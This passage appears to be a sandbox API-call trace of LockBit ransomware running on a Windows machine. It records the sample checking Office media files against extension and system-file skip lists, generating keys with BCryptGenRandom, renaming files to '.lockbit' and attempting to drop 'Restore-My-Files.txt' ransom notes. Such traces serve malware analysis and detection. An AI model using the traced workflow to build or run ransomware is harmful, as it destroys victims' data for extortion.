ftCreationTime.dwHighDateTime=0x1bdcf1f, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1638d100, ftLastWriteTime.dwHighDateTime=0x1bdcf1f, nFileSizeHigh=0x0, nFileSizeLow=0x704, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18213_.WMF", cAlternateFileName="")) returned 1 [0200.295] lstrcmpiW (lpString1=".", lpString2="BD18213_.WMF") returned -1 [0200.295] lstrcmpiW (lpString1="..", lpString2="BD18213_.WMF") returned -1 [0200.295] PathFindExtensionW (pszPath="BD18213_.WMF") returned=".WMF" [0200.295] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.295] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.295] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.295] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.295] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.295] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.296] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.296] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.297] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18213_.WMF") returned 1 [0200.297] lstrcmpiW (lpString1="ntldr", lpString2="BD18213_.WMF") returned 1 [0200.297] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18213_.WMF") returned 1 [0200.297] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18213_.WMF") returned 1 [0200.297] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18213_.WMF") returned -1 [0200.297] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18213_.WMF") returned 1 [0200.297] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18213_.WMF") returned 1 [0200.298] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.298] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF") returned=".WMF" [0200.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.298] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.298] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.299] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.299] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF.lockbit") returned 79 [0200.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18213_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.305] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.305] malloc (_Size=0x40068) returned 0x3df0008 [0200.305] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1796) returned 1 [0200.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.306] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.312] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.312] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.312] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.314] free (_Block=0x1fa2ed8) [0200.314] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.314] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.314] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0d7900, ftCreationTime.dwHighDateTime=0x1bdcf1f, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6c0d7900, ftLastWriteTime.dwHighDateTime=0x1bdcf1f, nFileSizeHigh=0x0, nFileSizeLow=0x7fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18214_.WMF", cAlternateFileName="")) returned 1 [0200.314] lstrcmpiW (lpString1=".", lpString2="BD18214_.WMF") returned -1 [0200.314] lstrcmpiW (lpString1="..", lpString2="BD18214_.WMF") returned -1 [0200.314] PathFindExtensionW (pszPath="BD18214_.WMF") returned=".WMF" [0200.314] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.314] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.315] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.315] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18214_.WMF") returned 1 [0200.316] lstrcmpiW (lpString1="ntldr", lpString2="BD18214_.WMF") returned 1 [0200.316] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18214_.WMF") returned 1 [0200.316] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18214_.WMF") returned 1 [0200.316] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18214_.WMF") returned -1 [0200.316] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18214_.WMF") returned 1 [0200.316] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18214_.WMF") returned 1 [0200.316] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.316] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF") returned=".WMF" [0200.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.316] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.317] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.318] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF.lockbit") returned 79 [0200.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18214_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0200.319] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.319] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.319] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2044) returned 1 [0200.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.320] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0200.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.771] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.771] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.773] free (_Block=0x1fa2ed8) [0200.773] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.773] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.773] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b613000, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2b613000, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x6a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18215_.WMF", cAlternateFileName="")) returned 1 [0200.773] lstrcmpiW (lpString1=".", lpString2="BD18215_.WMF") returned -1 [0200.773] lstrcmpiW (lpString1="..", lpString2="BD18215_.WMF") returned -1 [0200.773] PathFindExtensionW (pszPath="BD18215_.WMF") returned=".WMF" [0200.773] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.773] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.774] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.774] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18215_.WMF") returned 1 [0200.775] lstrcmpiW (lpString1="ntldr", lpString2="BD18215_.WMF") returned 1 [0200.775] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18215_.WMF") returned 1 [0200.775] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18215_.WMF") returned 1 [0200.775] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18215_.WMF") returned -1 [0200.775] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18215_.WMF") returned 1 [0200.775] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18215_.WMF") returned 1 [0200.775] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.775] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF") returned=".WMF" [0200.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.775] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.775] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.776] 